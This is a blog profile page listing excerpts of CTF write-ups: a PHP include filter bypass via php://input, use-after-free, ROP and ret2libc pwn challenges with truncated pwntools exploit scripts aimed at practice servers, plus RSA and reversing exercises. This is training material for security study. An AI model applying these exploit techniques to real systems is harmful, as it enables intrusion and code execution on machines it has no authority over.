自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 iptables-legacy 和 iptables-nft

kali中文件/proc/net/ip_tables_names看不到默认表。

2023-04-10 20:51:55 2003

原创 攻防世界|Web_php_include

这里将GET改为POST请求,通过include,php://input让服务器执行post传过去的代码,发现有三个文件,再用cat即可拿到flag。代码直接给出,会过滤掉php://,我尝试过双写,但没有成功,于是我将第一个p大写,成功绕过,bp改包如图。

2023-03-21 22:17:59 146

原创 buuctf|[HCTF 2018]admin 1

[HCTF 2018]admin1

2023-02-04 10:03:53 434 1

原创 MD5绕过

md5绕过

2023-02-03 23:42:44 811

原创 BUUCTF|[ACTF2020 新生赛]BackupFile 1

BUUCTF|[ACTF2020 新生赛]BackupFile 1

2023-02-01 23:27:04 711

原创 buu|hitcontraining_uaf 1

hitcontraining_uaf1这里一次会申请两个堆,其中第一个堆放着print_note_content前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可申请两个堆块儿释放掉0x10里有两个堆,都是之前存...

2022-07-09 00:58:30 195

原创 buu|inndy_rop 1

buuctf|inndy_rop1

2022-06-19 09:44:54 159

原创 buuctf|ciscn_2019_s_3 1

buuctf|ciscn_2019_s_3 1如下图明显的栈溢出这里调用了系统号为0x3B(十进制为59)的函数,查下表是exeve(‘/bin/sh’,0,0),为了控制寄存器使其第一个参数为/bin/sh,其余为0,需要用到csu控制寄存器exp如下from pwn import*#p=process('./pwn_30')p=remote('node4.buuoj.cn',27704)pop_bx_bp_12_13_14_15=0x40059Acsu_2=0x400580s

2022-05-21 21:56:40 337

原创 buuctf|[HarekazeCTF2019]baby_rop 1

buuctf|[HarekazeCTF2019]baby_rop 1分析下载文件重命名为pwn_15,checksec一下只开启了NX,64位,用ida看看这里可以栈溢出,同时在侧面看到了system()shift+F12查看字符串找到binsh,由于是64位,我们要寄存器传参,ROPgadget下exp如下from pwn import*p=remote('node4.buuoj.cn',25977)#p=process("./pwn_15")system_addr=0x

2022-05-02 21:47:30 1026

原创 buuctf|ciscn_2019_en_2 1

ciscn_2019_en_2 1下载后我重命名为pwn_14了checksec一下nx开启,可以栈溢出64位,用ida看看分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt有gets(s),可以进行栈溢出,没有找到后门函数。那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。exp如下from pwn import*from LibcSearcher import*context(os='linux', ar

2022-05-02 20:58:06 685

原创 buuctf|buuctf|get_started_3dsctf_2016 1

方法一我将文件下载后将其重命名为pwn_13,checksec一下可以直接栈溢出,32位,进入idagets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()exp如下from pwn import*p=remote('node4.buuoj.cn',26832)context.log_level='debu

2022-05-01 22:39:43 392

原创 buuctf|get_started_3dsctf_2016 1

方法一我将文件下载后将其重命名为pwn_13,checksec一下可以直接栈溢出,32位,进入idagets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()exp如下from pwn import*p=remote('node4.buuoj.cn',26832)context.log_level='debu

2022-05-01 22:31:45 681 1

原创 buuctf|warmup_csaw_2016 1

buuctf|warmup_csaw_2016 1下载文件运行如下checksec查看下保护file一下,是64位文件拉进ida,发现gets(v5),查看v5,明显的栈溢出找到system,地址40060d直接expfrom pwn import*p=remote('node4.buuoj.cn',28415)payload=b'A'*0x48+p64(0x40060D)p.sendline(payload)p.interactive()得flag...

2022-04-15 22:36:00 1423 3

原创 coffee

文件coffee用jd-gui打开,源码如下import java.io.BufferedReader;import java.io.InputStreamReader;public class coffee { public static String encodeone(String str, int n) { String str1 = null; return str1; } private static final byte[] encodingTabl

2022-03-22 11:22:05 3687

原创 buuctf-rsa_1

我们可以看到两个文件,根据题目,是rsa加密,如果不太了解rsa加密的可以去https://blog.csdn.net/gao131360144/article/details/79966094看看将pub.key用记事本打开得到加密公钥再进入http://www.hiencode.com/pub_asys.html对公钥进行解析,我们便得到了e,n在http://factordb.com/对n进行分解得p,q在这里我们要用到RSA Tool2 by ET!在工具里我们拿到了

2022-03-22 11:01:13 555

原创 攻防世界新——区re

​re_1___game直接ida,找到返回flag的函数,跟进,如图根据反编译代码写脚本得flagre_2__open-source源码如下#include <stdio.h>#include <string.h>int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsign

2022-03-22 10:50:27 375

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除